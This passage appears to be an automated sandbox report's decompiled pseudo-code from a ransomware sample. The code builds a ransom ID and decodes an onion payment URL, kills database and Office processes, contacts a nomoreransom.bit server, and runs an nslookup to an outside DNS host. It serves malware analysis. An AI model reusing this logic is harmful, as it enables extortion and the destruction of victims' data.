                                      				intOrPtr _v228;
                                      				char _v232;
                                      				WCHAR* _v236;
                                      				WCHAR* _v240;
                                      				void* _t44;
                                      				void* _t48;
                                      				void* _t50;
                                      				signed int _t51;
                                      				void* _t52;
                                      				WCHAR* _t56;
                                      				signed short _t60;
                                      				signed short* _t61;
                                      				WCHAR* _t68;
                                      				signed int _t73;
                                      				signed int _t74;
                                      				void* _t77;
                                      				void* _t80;
                                      				long _t83;
                                      				WCHAR* _t84;
                                      				signed int _t87;
                                      				void* _t88;
                                      				WCHAR* _t90;
                                      				void* _t92;
                                      				WCHAR* _t113;
                                      
                                      				if( *0x412b04 != 0) {
                                      					L25:
                                      					return _t44;
                                      				}
                                      				_push(__ecx);
                                      				_push(0);
                                      				_push(__ecx);
                                      				_push(0);
                                      				_push(0);
                                      				_push(__ecx);
                                      				_push(0);
                                      				_push(__ecx);
                                      				_push(0);
                                      				_push(__ecx);
                                      				_push(0);
                                      				_push(__ecx);
                                      				_push(0);
                                      				_push(0);
                                      				_push(__ecx);
                                      				_push(0);
                                      				E004039B0( &_v148);
                                      				E00406D90( &_v236);
                                      				_t87 = E00406BA0( &_v236);
                                      				_t83 = 0x42 + _t87 * 2;
                                      				_t48 = VirtualAlloc(0, _t83, 0x3000, 0x40);
                                      				_v240 = _t48;
                                      				if(_t48 == 0 || 0x40 + _t87 * 2 >= _t83) {
                                      					_t88 = 0;
                                      				} else {
                                      					_t88 = _t48;
                                      				}
                                      				E004069A0( &_v152, _t88);
                                      				_t50 = E00407BA0(_t88, L"ransom_id=");
                                      				_t51 = lstrlenW(L"ransom_id=");
                                      				asm("movdqa xmm1, [0x410940]");
                                      				_t68 = 0x412000;
                                      				_t77 = 0xad;
                                      				_t90 = _t50 + _t51 * 2;
                                      				_t52 = 0xad0;
                                      				_v240 = _t90;
                                      				do {
                                      					_t13 =  &(_t68[8]); // 0x44004e
                                      					_t68 = _t13;
                                      					asm("movdqu xmm0, [ecx-0x10]");
                                      					asm("pxor xmm0, xmm1");
                                      					asm("movdqu [ecx-0x10], xmm0");
                                      					_t77 = _t77 - 1;
                                      				} while (_t77 != 0);
                                      				do {
                                      					 *(_t52 + 0x412000) =  *(_t52 + 0x412000) ^ 0x00000005;
                                      					_t52 = _t52 + 1;
                                      				} while (_t52 < 0xad6);
                                      				 *0x412b04 = 0x412000;
                                      				_t84 = E00407BA0(0x412000, L"{USERID}");
                                      				if(_t84 == 0) {
                                      					L21:
                                      					_v232 = 0x740068;
                                      					_v228 = 0x700074;
                                      					_v224 = 0x2f003a;
                                      					_v220 = 0x67002f;
                                      					_v216 = 0x630064;
                                      					_v212 = 0x670062;
                                      					_v208 = 0x760068;
                                      					_v204 = 0x79006a;
                                      					_v200 = 0x790071;
                                      					_v196 = 0x6a0037;
                                      					_v192 = 0x6c0063;
                                      					_v188 = 0x2e006b;
                                      					_v184 = 0x6e006f;
                                      					_v180 = 0x6f0069;
                                      					_v176 = 0x2e006e;
                                      					_v172 = 0x6f0074;
                                      					_v168 = 0x2f0070;
                                      					_v164 = 0;
                                      					_t113 =  *0x412ae4; // 0x8d0000
                                      					if(_t113 == 0) {
                                      						_t56 = VirtualAlloc(0, 0x400, 0x3000, 4);
                                      						 *0x412ae4 = _t56;
                                      						if(_t56 != 0) {
                                      							wsprintfW(_t56, L"%s%s",  &_v232, _t90);
                                      						}
                                      					}
                                      					VirtualFree(_v156, 0, 0x8000);
                                      					_t44 = E00407720( &_v152);
                                      					goto L25;
                                      				}
                                      				while(1) {
                                      					L11:
                                      					lstrcpyW(_t84, _t90);
                                      					_t84[lstrlenW(_t84)] = 0x20;
                                      					_t84 = 0x412000;
                                      					_t60 =  *0x412000; // 0xfeff
                                      					if(_t60 == 0) {
                                      						goto L21;
                                      					}
                                      					_t73 = _t60 & 0x0000ffff;
                                      					_t92 = 0x412000 - L"{USERID}";
                                      					do {
                                      						_t61 = L"{USERID}";
                                      						if(_t73 == 0) {
                                      							goto L19;
                                      						}
                                      						while(1) {
                                      							_t74 =  *_t61 & 0x0000ffff;
                                      							if(_t74 == 0) {
                                      								break;
                                      							}
                                      							_t80 = ( *(_t92 + _t61) & 0x0000ffff) - _t74;
                                      							if(_t80 != 0) {
                                      								L18:
                                      								if( *_t61 == 0) {
                                      									break;
                                      								}
                                      								goto L19;
                                      							}
                                      							_t61 =  &(_t61[1]);
                                      							if( *(_t92 + _t61) != _t80) {
                                      								continue;
                                      							}
                                      							goto L18;
                                      						}
                                      						_t90 = _v236;
                                      						goto L11;
                                      						L19:
                                      						_t20 =  &(_t84[1]); // 0x2d002d
                                      						_t73 =  *_t20 & 0x0000ffff;
                                      						_t84 =  &(_t84[1]);
                                      						_t92 = _t92 + 2;
                                      					} while (_t73 != 0);
                                      					_t90 = _v236;
                                      					goto L21;
                                      				}
                                      				goto L21;
                                      			}














































                                      0x004040b5
                                      0x0040431c
                                      0x00404321
                                      0x00404321
                                      0x004040bb
                                      0x004040bc
                                      0x004040be
                                      0x004040bf
                                      0x004040c4
                                      0x004040c6
                                      0x004040c7
                                      0x004040c9
                                      0x004040ca
                                      0x004040cc
                                      0x004040cd
                                      0x004040cf
                                      0x004040d0
                                      0x004040d5
                                      0x004040d7
                                      0x004040d8
                                      0x004040e1
                                      0x004040ea
                                      0x004040f8
                                      0x00404101
                                      0x0040410b
                                      0x00404111
                                      0x00404117
                                      0x00404128
                                      0x00404124
                                      0x00404124
                                      0x00404124
                                      0x0040412f
                                      0x0040413b
                                      0x00404147
                                      0x0040414d
                                      0x00404155
                                      0x0040415a
                                      0x0040415f
                                      0x00404162
                                      0x00404167
                                      0x00404170
                                      0x00404170
                                      0x00404170
                                      0x00404173
                                      0x00404178
                                      0x0040417c
                                      0x00404181
                                      0x00404181
                                      0x00404190
                                      0x00404190
                                      0x00404197
                                      0x00404198
                                      0x004041a4
                                      0x004041b8
                                      0x004041bc
                                      0x0040423a
                                      0x0040423c
                                      0x00404244
                                      0x0040424c
                                      0x00404254
                                      0x0040425c
                                      0x00404264
                                      0x0040426c
                                      0x00404274
                                      0x0040427c
                                      0x00404284
                                      0x0040428c
                                      0x00404294
                                      0x0040429c
                                      0x004042a4
                                      0x004042ac
                                      0x004042b4
                                      0x004042bc
                                      0x004042c4
                                      0x004042c9
                                      0x004042cf
                                      0x004042de
                                      0x004042e4
                                      0x004042eb
                                      0x004042f9
                                      0x004042ff
                                      0x004042eb
                                      0x0040430d
                                      0x00404317
                                      0x00000000
                                      0x00404317
                                      0x004041c0
                                      0x004041c0
                                      0x004041c2
                                      0x004041d4
                                      0x004041d8
                                      0x004041dd
                                      0x004041e6
                                      0x00000000
                                      0x00000000
                                      0x004041ea
                                      0x004041ed
                                      0x004041f3
                                      0x004041f3
                                      0x004041fb
                                      0x00000000
                                      0x00000000
                                      0x00404200
                                      0x00404200
                                      0x00404206
                                      0x00000000
                                      0x00000000
                                      0x00404210
                                      0x00404212
                                      0x0040421d
                                      0x00404221
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00404221
                                      0x00404214
                                      0x0040421b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040421b
                                      0x00404322
                                      0x00000000
                                      0x00404227
                                      0x00404227
                                      0x00404227
                                      0x0040422b
                                      0x0040422e
                                      0x00404231
                                      0x00404236
                                      0x00000000
                                      0x00404236
                                      0x00000000

                                      APIs
                                        • Part of subcall function 004039B0: GetProcessHeap.KERNEL32(?,?,00404587,00000000,?,00000000), ref: 00403A4C
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00406DB7
                                        • Part of subcall function 00406D90: GetUserNameW.ADVAPI32(00000000,?), ref: 00406DC8
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00406DE6
                                        • Part of subcall function 00406D90: GetComputerNameW.KERNEL32 ref: 00406DF0
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 00406E10
                                        • Part of subcall function 00406D90: wsprintfW.USER32 ref: 00406E51
                                        • Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E6E
                                        • Part of subcall function 00406D90: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00406E92
                                        • Part of subcall function 00406D90: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,?,?), ref: 00406EB6
                                        • Part of subcall function 00406D90: RegCloseKey.ADVAPI32(00000000), ref: 00406ED2
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BF2
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BFD
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C13
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C1E
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(004048B6,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C34
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C3F
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C55
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C60
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C76
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C81
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C97
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CA2
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CC1
                                        • Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CCC
                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040410B
                                      • lstrlenW.KERNEL32(ransom_id=,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00404147
                                      • lstrcpyW.KERNEL32 ref: 004041C2
                                      • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004041C9
                                      • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 004042DE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$AllocVirtual$Name$CloseComputerHeapOpenProcessQueryUserValuelstrcpywsprintf
                                      • String ID: %s%s$/$7$:$b$c$d$h$h$i$j$k$n$o$p$q$ransom_id=$t$t${USERID}
                                      • API String ID: 4100118565-914392996
                                      • Opcode ID: 9ef8ab6f65e3180621a96e978af0e414a349b7cd4cbb51f09f0a87e37010286e
                                      • Instruction ID: 44f1d7409a56cb0d5c487c66e452f22c269fbcb55178584459732c151bd8d75b
                                      • Opcode Fuzzy Hash: 9ef8ab6f65e3180621a96e978af0e414a349b7cd4cbb51f09f0a87e37010286e
                                      • Instruction Fuzzy Hash: E451F5B06143009AE7209F11DD0976B7BA5EBC0748F404A3EFA817B2D1E7B8AD55C79E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 98%
                                      			E00404640() {
                                      				char* _v12;
                                      				char* _v16;
                                      				char* _v20;
                                      				char* _v24;
                                      				char* _v28;
                                      				char* _v32;
                                      				char* _v36;
                                      				char* _v40;
                                      				char* _v44;
                                      				char* _v48;
                                      				char* _v52;
                                      				char* _v56;
                                      				char* _v60;
                                      				char* _v64;
                                      				char* _v68;
                                      				char* _v72;
                                      				char* _v76;
                                      				char* _v80;
                                      				char* _v84;
                                      				char* _v88;
                                      				char* _v92;
                                      				char* _v96;
                                      				char* _v100;
                                      				char* _v104;
                                      				char* _v108;
                                      				char* _v112;
                                      				char* _v116;
                                      				char* _v120;
                                      				char* _v124;
                                      				char* _v128;
                                      				char* _v132;
                                      				char* _v136;
                                      				char* _v140;
                                      				char* _v144;
                                      				char* _v148;
                                      				char* _v152;
                                      				char* _v156;
                                      				char* _v160;
                                      				char* _v164;
                                      				void* _v172;
                                      				int _t51;
                                      				int _t52;
                                      				void* _t60;
                                      				WCHAR* _t62;
                                      				void* _t65;
                                      				void* _t70;
                                      				signed int _t71;
                                      				void* _t72;
                                      				signed int _t74;
                                      				void* _t76;
                                      
                                      				_t76 = (_t74 & 0xfffffff8) - 0xa4;
                                      				_v164 = L"msftesql.exe";
                                      				_v160 = L"sqlagent.exe";
                                      				_v156 = L"sqlbrowser.exe";
                                      				_v152 = L"sqlservr.exe";
                                      				_v148 = L"sqlwriter.exe";
                                      				_v144 = L"oracle.exe";
                                      				_v140 = L"ocssd.exe";
                                      				_v136 = L"dbsnmp.exe";
                                      				_v132 = L"synctime.exe";
                                      				_v128 = L"mydesktopqos.exe";
                                      				_v124 = L"agntsvc.exeisqlplussvc.exe";
                                      				_v120 = L"xfssvccon.exe";
                                      				_v116 = L"mydesktopservice.exe";
                                      				_v112 = L"ocautoupds.exe";
                                      				_v108 = L"agntsvc.exeagntsvc.exe";
                                      				_v104 = L"agntsvc.exeencsvc.exe";
                                      				_v100 = L"firefoxconfig.exe";
                                      				_v96 = L"tbirdconfig.exe";
                                      				_v92 = L"ocomm.exe";
                                      				_v88 = L"mysqld.exe";
                                      				_v84 = L"mysqld-nt.exe";
                                      				_v80 = L"mysqld-opt.exe";
                                      				_v76 = L"dbeng50.exe";
                                      				_v72 = L"sqbcoreservice.exe";
                                      				_v68 = L"excel.exe";
                                      				_v64 = L"infopath.exe";
                                      				_v60 = L"msaccess.exe";
                                      				_v56 = L"mspub.exe";
                                      				_v52 = L"onenote.exe";
                                      				_v48 = L"outlook.exe";
                                      				_v44 = L"powerpnt.exe";
                                      				_v40 = L"steam.exe";
                                      				_v36 = L"sqlservr.exe";
                                      				_v32 = L"thebat.exe";
                                      				_v28 = L"thebat64.exe";
                                      				_v24 = L"thunderbird.exe";
                                      				_v20 = L"visio.exe";
                                      				_v16 = L"winword.exe";
                                      				_v12 = L"wordpad.exe";
                                      				_t70 = CreateToolhelp32Snapshot(2, 0);
                                      				_v172 = _t70;
                                      				_t60 = VirtualAlloc(0, 0x22c, 0x3000, 4);
                                      				if(_t60 != 0) {
                                      					 *_t60 = 0x22c;
                                      					if(_t70 != 0xffffffff) {
                                      						_push(_t60);
                                      						Process32FirstW(_t70);
                                      					}
                                      				}
                                      				_t41 = _t60 + 0x24; // 0x24
                                      				_t62 = _t41;
                                      				do {
                                      					_t71 = 0;
                                      					do {
                                      						_t51 = lstrcmpiW( *(_t76 + 0x14 + _t71 * 4), _t62);
                                      						if(_t51 == 0) {
                                      							_t65 = OpenProcess(1, _t51,  *(_t60 + 8));
                                      							if(_t65 != 0) {
                                      								TerminateProcess(_t65, 0);
                                      								CloseHandle(_t65);
                                      							}
                                      						}
                                      						_t71 = _t71 + 1;
                                      						_t46 = _t60 + 0x24; // 0x24
                                      						_t62 = _t46;
                                      					} while (_t71 < 0x27);
                                      					_t72 = _v172;
                                      					_t52 = Process32NextW(_t72, _t60);
                                      					_t48 = _t60 + 0x24; // 0x24
                                      					_t62 = _t48;
                                      				} while (_t52 != 0);
                                      				if(_t60 != 0) {
                                      					VirtualFree(_t60, 0, 0x8000);
                                      				}
                                      				return CloseHandle(_t72);
                                      			}





















































                                      0x00404646
                                      0x00404653
                                      0x0040465b
                                      0x00404663
                                      0x0040466b
                                      0x00404673
                                      0x0040467b
                                      0x00404683
                                      0x0040468b
                                      0x00404693
                                      0x0040469b
                                      0x004046a3
                                      0x004046ab
                                      0x004046b3
                                      0x004046bb
                                      0x004046c3
                                      0x004046cb
                                      0x004046d3
                                      0x004046db
                                      0x004046e3
                                      0x004046eb
                                      0x004046f3
                                      0x004046fb
                                      0x00404703
                                      0x0040470b
                                      0x00404713
                                      0x0040471b
                                      0x00404723
                                      0x0040472e
                                      0x00404739
                                      0x00404744
                                      0x0040474f
                                      0x0040475a
                                      0x00404765
                                      0x00404770
                                      0x0040477b
                                      0x00404786
                                      0x00404791
                                      0x0040479c
                                      0x004047a7
                                      0x004047c4
                                      0x004047c8
                                      0x004047d2
                                      0x004047d6
                                      0x004047d8
                                      0x004047e1
                                      0x004047e3
                                      0x004047e5
                                      0x004047e5
                                      0x004047e1
                                      0x004047f1
                                      0x004047f1
                                      0x004047f4
                                      0x004047f4
                                      0x00404800
                                      0x00404805
                                      0x0040480d
                                      0x0040481b
                                      0x0040481f
                                      0x00404824
                                      0x00404831
                                      0x00404831
                                      0x0040481f
                                      0x0040483b
                                      0x0040483c
                                      0x0040483c
                                      0x0040483f
                                      0x00404844
                                      0x0040484a
                                      0x00404850
                                      0x00404850
                                      0x00404853
                                      0x00404859
                                      0x00404863
                                      0x00404863
                                      0x00404872

                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 004047B2
                                      • VirtualAlloc.KERNEL32(00000000,0000022C,00003000,00000004), ref: 004047CC
                                      • Process32FirstW.KERNEL32(00000000,00000000), ref: 004047E5
                                      • lstrcmpiW.KERNEL32(00000002,00000024), ref: 00404805
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00404815
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00404824
                                      • CloseHandle.KERNEL32(00000000), ref: 00404831
                                      • Process32NextW.KERNEL32(?,00000000), ref: 0040484A
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404863
                                      • CloseHandle.KERNEL32(?), ref: 0040486A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcessProcess32Virtual$AllocCreateFirstFreeNextOpenSnapshotTerminateToolhelp32lstrcmpi
                                      • String ID: @$(@$0@$8@$<@$@@$L@$P@$X@$\@$\@$`@$l@$l@$x@$x@$@
                                      • API String ID: 3586910739-3725814736
                                      • Opcode ID: 9888b97dcf90e8f6efa24b4065dea21d40555a31716fc4df83624dfcfe3835c8
                                      • Instruction ID: 5199461c7d7482eac4530f3025dd1142b0b19823d44abf373f40a8b8b0f494f1
                                      • Opcode Fuzzy Hash: 9888b97dcf90e8f6efa24b4065dea21d40555a31716fc4df83624dfcfe3835c8
                                      • Instruction Fuzzy Hash: 41515CB51083409FE7209F12994874BBBE4ABC5708F508D3EE6943B2D1D7B88819CF9E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00407A00(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16, void* _a20, intOrPtr _a24, WCHAR* _a36, WCHAR* _a40, long _a44) {
                                      				long _v8;
                                      				void* _v12;
                                      				void* _v16;
                                      				short _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				intOrPtr _v52;
                                      				intOrPtr _v56;
                                      				intOrPtr _v60;
                                      				short _v64;
                                      				void* _t38;
                                      				void* _t40;
                                      				long _t55;
                                      				long _t60;
                                      				WCHAR* _t63;
                                      				void* _t64;
                                      				void* _t65;
                                      				void* _t66;
                                      				void* _t68;
                                      
                                      				_t65 = __ecx;
                                      				_t38 =  *(__ecx + 4);
                                      				if(_t38 != 0) {
                                      					InternetCloseHandle(_t38);
                                      				}
                                      				E004077F0(_t65);
                                      				_t40 = InternetConnectW( *(_t65 + 4), _a4, 0x50, 0, 0, 3, 0, 0);
                                      				_t66 = _t40;
                                      				_v8 = 0;
                                      				_v12 = _t66;
                                      				if(_t66 != 0) {
                                      					_t63 = VirtualAlloc(0, 0x2800, 0x3000, 0x40);
                                      					_v16 = _t63;
                                      					wsprintfW(_t63, L"%s", _a8);
                                      					_t64 = HttpOpenRequestW(_t66, _a36, _t63, L"HTTP/1.1", 0, 0, 0x8404f700, 0);
                                      					if(_t64 != 0) {
                                      						_v64 = 0x6f0048;
                                      						_v20 = 0;
                                      						_v60 = 0x740073;
                                      						_v56 = 0x20003a;
                                      						_v52 = 0x6f006e;
                                      						_v48 = 0x6f006d;
                                      						_v44 = 0x650072;
                                      						_v40 = 0x610072;
                                      						_v36 = 0x73006e;
                                      						_v32 = 0x6d006f;
                                      						_v28 = 0x62002e;
                                      						_v24 = 0x740069;
                                      						if(HttpAddRequestHeadersW(_t64,  &_v64, 0xffffffff, 0) != 0) {
                                      							if(HttpSendRequestW(_t64, _a40, _a44, _a12, _a16) == 0) {
                                      								GetLastError();
                                      							} else {
                                      								_t68 = _a20;
                                      								_t60 = _a24 - 1;
                                      								_a4 = 0;
                                      								if(InternetReadFile(_t64, _t68, _t60,  &_a4) != 0) {
                                      									while(1) {
                                      										_t55 = _a4;
                                      										if(_t55 == 0) {
                                      											goto L13;
                                      										}
                                      										 *((char*)(_t55 + _t68)) = 0;
                                      										_a4 = 0;
                                      										_v8 = 1;
                                      										if(InternetReadFile(_t64, _t68, _t60,  &_a4) != 0) {
                                      											continue;
                                      										} else {
                                      										}
                                      										goto L13;
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      					L13:
                                      					InternetCloseHandle(_t64);
                                      					InternetCloseHandle(_v12);
                                      					VirtualFree(_v16, 0, 0x8000);
                                      					return _v8;
                                      				} else {
                                      					return _t40;
                                      				}
                                      			}



























                                      0x00407a08
                                      0x00407a0b
                                      0x00407a10
                                      0x00407a13
                                      0x00407a13
                                      0x00407a1b
                                      0x00407a32
                                      0x00407a38
                                      0x00407a3a
                                      0x00407a41
                                      0x00407a46
                                      0x00407a68
                                      0x00407a70
                                      0x00407a73
                                      0x00407a97
                                      0x00407a9b
                                      0x00407aa3
                                      0x00407aab
                                      0x00407ab6
                                      0x00407abd
                                      0x00407ac4
                                      0x00407acb
                                      0x00407ad2
                                      0x00407ad9
                                      0x00407ae0
                                      0x00407ae7
                                      0x00407aee
                                      0x00407af5
                                      0x00407b04
                                      0x00407b1b
                                      0x00407b6c
                                      0x00407b1d
                                      0x00407b23
                                      0x00407b26
                                      0x00407b2b
                                      0x00407b3a
                                      0x00407b40
                                      0x00407b40
                                      0x00407b45
                                      0x00000000
                                      0x00000000
                                      0x00407b47
                                      0x00407b52
                                      0x00407b59
                                      0x00407b68
                                      0x00000000
                                      0x00000000
                                      0x00407b6a
                                      0x00000000
                                      0x00407b68
                                      0x00407b40
                                      0x00407b3a
                                      0x00407b1b
                                      0x00407b04
                                      0x00407b72
                                      0x00407b79
                                      0x00407b7e
                                      0x00407b8a
                                      0x00407b99
                                      0x00407a4e
                                      0x00407a4e
                                      0x00407a4e

                                      APIs
                                      • InternetCloseHandle.WININET(?), ref: 00407A13
                                      • InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 00407A32
                                      • VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000040,?,?,?,?,?,?,?,?,00406946,ipv4bot.whatismyipaddress.com,004103B0,00000000), ref: 00407A5F
                                      • wsprintfW.USER32 ref: 00407A73
                                      • HttpOpenRequestW.WININET(00000000,?,00000000,HTTP/1.1,00000000,00000000,8404F700,00000000), ref: 00407A91
                                      • HttpAddRequestHeadersW.WININET(00000000,006F0048,000000FF,00000000), ref: 00407AFC
                                      • HttpSendRequestW.WININET(00000000,006F006D,006F006E,00000000,00740069), ref: 00407B13
                                      • InternetReadFile.WININET(00000000,0062002E,006D006E,00000000), ref: 00407B32
                                      • InternetReadFile.WININET(00000000,0062002E,006D006E,00000000), ref: 00407B60
                                      • GetLastError.KERNEL32 ref: 00407B6C
                                      • InternetCloseHandle.WININET(00000000), ref: 00407B79
                                      • InternetCloseHandle.WININET(00000000), ref: 00407B7E
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00406946,ipv4bot.whatismyipaddress.com), ref: 00407B8A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHttpRequest$FileReadVirtual$AllocConnectErrorFreeHeadersLastOpenSendwsprintf
                                      • String ID: .$:$Fi@$H$HTTP/1.1$i$m$n$n$o$r$r$s
                                      • API String ID: 3906118045-996335725
                                      • Opcode ID: c8dddac5ca2f289de5ab4859de8dc5ee87e9a581b745c866a59695c1e2178a40
                                      • Instruction ID: 138ab0025d8835c4ee6cf1b85085083e902cc9d23406ca5e2eb97d724ccf74a6
                                      • Opcode Fuzzy Hash: c8dddac5ca2f289de5ab4859de8dc5ee87e9a581b745c866a59695c1e2178a40
                                      • Instruction Fuzzy Hash: AD418371A00209BBEB109F51DD49FDE7FB9FF04754F10402AFA04BA2A1C7B5A950CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00404D60(CHAR* __ecx, void* __edx) {
                                      				struct _SECURITY_ATTRIBUTES _v16;
                                      				short _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				intOrPtr _v52;
                                      				intOrPtr _v56;
                                      				intOrPtr _v60;
                                      				intOrPtr _v64;
                                      				intOrPtr _v68;
                                      				intOrPtr _v72;
                                      				short _v76;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed int _t24;
                                      				void* _t37;
                                      				CHAR* _t43;
                                      				void* _t45;
                                      
                                      				_v76 = 0x73006e;
                                      				_v20 = 0;
                                      				_t37 = __edx;
                                      				_v16.lpSecurityDescriptor = 0;
                                      				_t43 = __ecx;
                                      				_v72 = 0x6f006c;
                                      				_v68 = 0x6b006f;
                                      				_v64 = 0x700075;
                                      				_v60 = 0x250020;
                                      				_v56 = 0x200053;
                                      				_v52 = 0x6e0064;
                                      				_v48 = 0x310073;
                                      				_v44 = 0x73002e;
                                      				_v40 = 0x70006f;
                                      				_v36 = 0x6f0072;
                                      				_v32 = 0x6e0064;
                                      				_v28 = 0x2e0073;
                                      				_v24 = 0x750072;
                                      				_v16.nLength = 0xc;
                                      				_v16.bInheritHandle = 1;
                                      				_t24 = CreatePipe(0x412b10, 0x412b0c,  &_v16, 0);
                                      				if(_t24 != 0) {
                                      					_t24 = SetHandleInformation( *0x412b10, 1, 0);
                                      					if(_t24 == 0) {
                                      						goto L1;
                                      					} else {
                                      						CreatePipe(0x412b08, 0x412b14,  &_v16, 0);
                                      						_t24 = SetHandleInformation( *0x412b14, 1, 0);
                                      						if(_t24 == 0) {
                                      							goto L1;
                                      						} else {
